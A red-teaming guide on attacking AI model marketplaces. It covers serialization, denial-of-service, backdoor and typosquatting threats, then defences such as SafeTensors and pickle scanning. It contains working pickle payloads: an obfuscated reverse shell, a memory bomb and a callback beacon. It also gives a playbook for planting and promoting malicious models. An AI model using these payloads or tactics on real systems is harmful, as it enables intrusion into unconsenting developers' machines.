Model marketplaces like Hugging Face Hub, TensorFlow Hub, and others have become the de facto package managers for the AI world. They accelerate development at an unprecedented scale, but this convenience introduces a vast and often overlooked attack surface. By treating these hubs as implicitly trusted sources, organizations expose themselves to a range of supply chain attacks that mirror threats long seen in traditional software dependencies, but with unique AI-specific twists.
Your role as a red teamer is to challenge this implicit trust. You must demonstrate that the act of downloading a pre-trained model is as critical a security checkpoint as installing a third-party library. The threats are not theoretical; they are practical and actively exploited.
The Marketplace as a Delivery Mechanism
An adversary views a model marketplace not as a library of tools, but as a distribution platform for malware. The goal is to get a malicious payload onto a target system, and a popular-looking model is an excellent Trojan horse. These attacks exploit the entire ecosystem surrounding the model, from its code to its documentation.
The core threats can be categorized into several distinct types:
Key Threat Categories in Model Marketplaces
- Arbitrary Code Execution via Serialization: The most severe threat. Many models are saved using formats like Python’s pickle, which can be weaponized to execute arbitrary code on the machine that loads the model.
- Model-Based Denial of Service (DoS): A model crafted to consume exorbitant amounts of RAM, VRAM, or CPU upon loading or during inference, effectively crippling the host system. This is a resource exhaustion attack (a minimal sketch follows this list).
- Backdoor Poisoning: As discussed in Chapter 10.1.1, a model can be poisoned with a hidden backdoor. The marketplace is the primary vector for distributing these compromised models to unsuspecting victims.
- Social Engineering and Impersonation: Using deceptive names (typosquatting), falsified performance metrics, and malicious instructions in model cards to trick developers into downloading the wrong model or an outright malicious one.
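To make the resource-exhaustion category concrete, here is a minimal sketch of a denial-of-service pickle; it is illustrative only, and the file name and the roughly 100 GB allocation size are arbitrary choices. The attack targets the loader itself rather than spawning a shell.

```python
import pickle

class MemoryBomb:
    """Illustrative DoS payload: loading it attempts a ~100 GB allocation."""
    def __reduce__(self):
        # The unpickler calls bytearray(100_000_000_000) during load,
        # exhausting RAM (or triggering the OOM killer) before the "model"
        # is ever evaluated or inspected.
        return (bytearray, (100_000_000_000,))

# Attacker writes the booby-trapped file; any later pickle.load() on it
# triggers the allocation immediately.
with open('resource_bomb.pkl', 'wb') as f:
    pickle.dump(MemoryBomb(), f)
```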
Attack Vector: Weaponizing Model Serialization
The danger of unsafe deserialization is a well-known vulnerability in general software security, but it takes on special significance in MLOps. The pickle format in Python, while convenient for saving complex objects like ML models, is notoriously insecure because it can be instructed to run arbitrary code during the unpickling process. An attacker can craft a malicious model file that, when loaded, executes a payload.
Consider this example, where an attacker defines a custom class with a malicious __reduce__ method. Pickle calls __reduce__ while serializing the object, and the function-and-arguments tuple it returns is recorded in the file; the unpickler then invokes that function when the file is loaded.
```python
import pickle
import os
import base64

# Attacker's payload: a reverse shell command, base64-encoded to keep it
# out of casual source review. Decodes to:
#   bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
PAYLOAD = b'YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjEi'

class MaliciousModel:
    def __init__(self):
        # A seemingly normal model attribute
        self.weights = [1.0, 2.0, 3.0]

    def __reduce__(self):
        # This is the malicious part. pickle calls __reduce__ while dumping,
        # and the tuple it returns tells the unpickler what to call on load:
        # here, os.system with the decoded reverse shell command.
        return (os.system, (base64.b64decode(PAYLOAD).decode(),))

# Attacker creates an instance of the malicious object
malicious_object = MaliciousModel()

# Attacker saves it to a file, e.g., 'malicious_model.pkl'
with open('malicious_model.pkl', 'wb') as f:
    pickle.dump(malicious_object, f)

# --- Victim's machine ---
# A developer downloads 'malicious_model.pkl' and tries to load it:
# with open('malicious_model.pkl', 'rb') as f:
#     loaded_model = pickle.load(f)  # The payload executes here!
```
When the victim runs pickle.load(), the reverse shell command is executed, giving the attacker access to their system. This is why formats like SafeTensors are gaining popularity—they are designed specifically to prevent this type of arbitrary code execution by storing only the tensor data without executable code.
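For the defensive side of this point, the following is a minimal comparison sketch, assuming a recent PyTorch (for the weights_only flag) and the safetensors package are installed; the file names and the toy state dict are placeholders rather than part of any real workflow.

```python
import torch
from safetensors.torch import save_file, load_file

# Stand-in for weights pulled from a marketplace.
state_dict = {"linear.weight": torch.randn(4, 4), "linear.bias": torch.zeros(4)}
torch.save(state_dict, "downloaded_model.pt")

# Unsafe: plain torch.load() falls back to pickle and will execute any
# callable a malicious checkpoint smuggles in.
# loaded = torch.load("downloaded_model.pt")

# Safer: restrict the unpickler to tensors and basic containers, so
# references to os.system, eval, and the like are rejected.
loaded = torch.load("downloaded_model.pt", weights_only=True)

# Safest: round-trip the weights through safetensors, which stores raw
# tensor bytes plus a JSON header and has no code path to run at load time.
save_file(loaded, "model.safetensors")
tensors = load_file("model.safetensors")
```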
Red Team Engagement: Simulating a Marketplace Attack
Your objective in a red team exercise is to test the organization’s resilience to a compromised model from a public or internal marketplace. The goal is not just to gain execution, but to assess the entire detection and response pipeline.
Figure 1: The model marketplace as a vector for payload delivery.
Operational Playbook
- Reconnaissance: Identify the types of models and frameworks used by the target organization. Are they using PyTorch or TensorFlow? What specific tasks are they working on (e.g., NLP, computer vision)? This helps in crafting a believable malicious model.
- Payload Development: Create a benign-looking model that performs a plausible task. Embed a non-destructive payload, such as a beacon that performs a DNS lookup or an HTTP request to a server you control upon loading. This confirms execution without causing damage. Use the serialization technique shown above (a beacon sketch follows this playbook).
- Camouflage and Distribution: Upload the model to a public marketplace. Use typosquatting (e.g., `roberta-base-finetuned` instead of `roberta-base`) or create a new model with an appealing name and a well-written model card. If the organization has an internal marketplace, gaining access to it becomes the primary objective.
- Social Engineering: Subtly promote the model. Mention it in relevant Discord servers, forums, or Stack Overflow questions where developers from the target organization might be active.
- Monitor and Report: Monitor for callbacks from your payload. A successful execution indicates a critical failure in the organization’s model vetting and security controls. Your report should detail the path of compromise, the lack of sandboxing, and the failure to inspect the model source.
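As a concrete reference for the payload-development step above, here is a beacon sketch built on the same __reduce__ technique; the callback URL, engagement tag, and model file name are placeholders you would replace with infrastructure and naming appropriate to the engagement.

```python
import pickle
import urllib.request

# Placeholder callback endpoint; point this at logging infrastructure you
# control and make it unique per engagement so hits are attributable.
BEACON_URL = 'https://redteam-callback.example.com/beacon?engagement=model-hub-test'

class BeaconModel:
    def __init__(self):
        # Plausible-looking attributes so casual inspection raises no flags.
        self.weights = [0.1, 0.2, 0.3]

    def __reduce__(self):
        # On load, the victim host makes a single outbound HTTP request
        # (5-second timeout), proving code execution without harming the system.
        return (urllib.request.urlopen, (BEACON_URL, None, 5))

with open('sentiment-classifier-finetuned.pkl', 'wb') as f:
    pickle.dump(BeaconModel(), f)
```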
Defensive Strategies and Mitigation
Defending against marketplace threats requires a multi-layered approach that combines technical controls with developer education. You cannot simply block access to public hubs, as this would cripple development.
| Strategy | Description | Red Team Consideration |
|---|---|---|
| Internal Model Registry | Maintain a private, curated registry of approved models. Models from public sources are scanned, vetted, and signed before being made available to internal developers. | The registry itself becomes a high-value target. Can you compromise the vetting process or the registry infrastructure? |
| Mandatory Security Scanning | Integrate tools like `picklescan` or other static/dynamic scanners into the CI/CD pipeline to automatically check any new model dependency for known malicious patterns or code execution risks (see the sketch after this table). | Test the efficacy of these scanners. Can you create a payload that evades their detection logic? |
| Use Safe Serialization Formats | Enforce the use of “safe” formats like SafeTensors, which are designed to store only tensor data and prevent arbitrary code execution by design. | Are there ways to trick developers into using an unsafe loader even for a safe format? Social engineering in documentation is a key vector. |
| Sandboxed Execution | Load and test all new models in a heavily restricted and monitored sandbox environment (e.g., a container with no network access) before promoting them to development or production. | Can your payload detect a sandbox environment and delay execution? Can it find a way to break out of the container? |
| Provenance Verification | Train developers to verify the source of a model. Is it from a reputable organization like Google or Meta, or from an unknown user with no history? Check for digital signatures if the platform supports them. | How easy is it to impersonate a reputable source? Test the developers’ skepticism with a well-crafted fake repository. |
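To make the scanning row concrete, here is a simplified stand-in for a tool like picklescan, built only on the standard library's pickletools module; the denylist is illustrative and deliberately incomplete, and the final call assumes the malicious_model.pkl file created earlier in this section.

```python
import pickletools

# Illustrative denylist: imports a weights-only file has no reason to make.
SUSPICIOUS = {
    ('os', 'system'), ('posix', 'system'), ('nt', 'system'),
    ('subprocess', 'Popen'), ('subprocess', 'run'),
    ('builtins', 'eval'), ('builtins', 'exec'), ('builtins', '__import__'),
}

def scan_pickle(path):
    """Flag suspicious GLOBAL/STACK_GLOBAL imports in a pickle stream."""
    findings = []
    recent_strings = []  # rough approximation of the unpickler's stack
    with open(path, 'rb') as f:
        for opcode, arg, _pos in pickletools.genops(f):
            if opcode.name in ('SHORT_BINUNICODE', 'BINUNICODE', 'UNICODE'):
                recent_strings.append(arg)
            elif opcode.name == 'STACK_GLOBAL' and len(recent_strings) >= 2:
                # Protocol 4+ pushes module and attribute names as strings.
                module, name = recent_strings[-2], recent_strings[-1]
                if (module, name) in SUSPICIOUS:
                    findings.append(f'imports {module}.{name}')
            elif opcode.name in ('GLOBAL', 'INST') and arg:
                # Older protocols encode "module name" as a space-separated pair.
                module, _, name = str(arg).rpartition(' ')
                if (module, name) in SUSPICIOUS:
                    findings.append(f'imports {module}.{name}')
    return findings

print(scan_pickle('malicious_model.pkl'))
```

A payload author will try to evade exactly this kind of static denylist, for example through indirect imports, which is why the red-team consideration in that row pairs scanning with evasion testing.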
Ultimately, the most effective defense is a security-aware culture. When developers understand that a .pkl or .pt file can be as dangerous as an unknown executable, they become the first and most important line of defense against these supply chain attacks.